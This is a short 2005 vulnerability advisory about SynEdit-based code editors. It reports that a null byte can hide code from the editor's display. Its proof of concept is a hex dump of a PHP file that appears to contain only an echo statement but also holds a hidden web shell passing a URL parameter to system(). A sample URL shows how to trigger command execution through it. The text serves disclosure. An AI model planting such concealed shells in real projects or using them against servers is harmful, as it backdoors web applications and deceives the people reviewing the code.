23.47 08/08/2005

Synedit 2.0.1 (possibly prior versions) null byte insertion / code obfuscation


software description:SynEdit is an advanced multi-line edit control, 
for Borland Delphi, Kylix (Kylix is supported into latest cvs) and C++Builder.
It supports Syntax Highlighting and code completion, 
it does include exporters for html,tex and rtf.

exploit: a user can craft a malicious file using null byte (%00) to obfuscate
code and hide malicious instrunctions to the victim user

poc:

this an exadecimal dump of the file:

3c 3f 70 68 70 20 65 63 68 6f 20 27 68 65 6c 6c    < ? p h p  e c h o  ' h e l l 
6f 21 27 3b 00 20 73 79 73 74 65 6d 28 24 48 54    o ! ' ;   s y s t e m ( $ H T 
54 50 5f 47 45 54 5f 56 41 52 53 5b 63 6f 6d 6d    T P _ G E T _ V A R S [ c o m m 
61 6e 64 5d 29 3b 20 3f 3e                         a n d ] ) ;  ? >  

the file hides a php system shell.
Try to open it in Dev PHP, PHP Designer 2005 or other developing software using
Synedit.

It looks like this:

<?php echo 'hello!';

but when you call this url:

http://[some_host]/[path]/poc.php?command=dir

dir command will be executed...

Tested on: 
Microsoft Visual C++ 6.0
Borland Delphi 7.0 Enterprise Edition
PHP Designer 2005 2.2.8
Dev-PHP Version: 2.0.12
Bloodshed Dev-Pascal 1.9.2

on Windows XP Service Pack 2
and so on...


rgod
site: http://rgod.altervista.org
mail: retrogod at aliceposta.it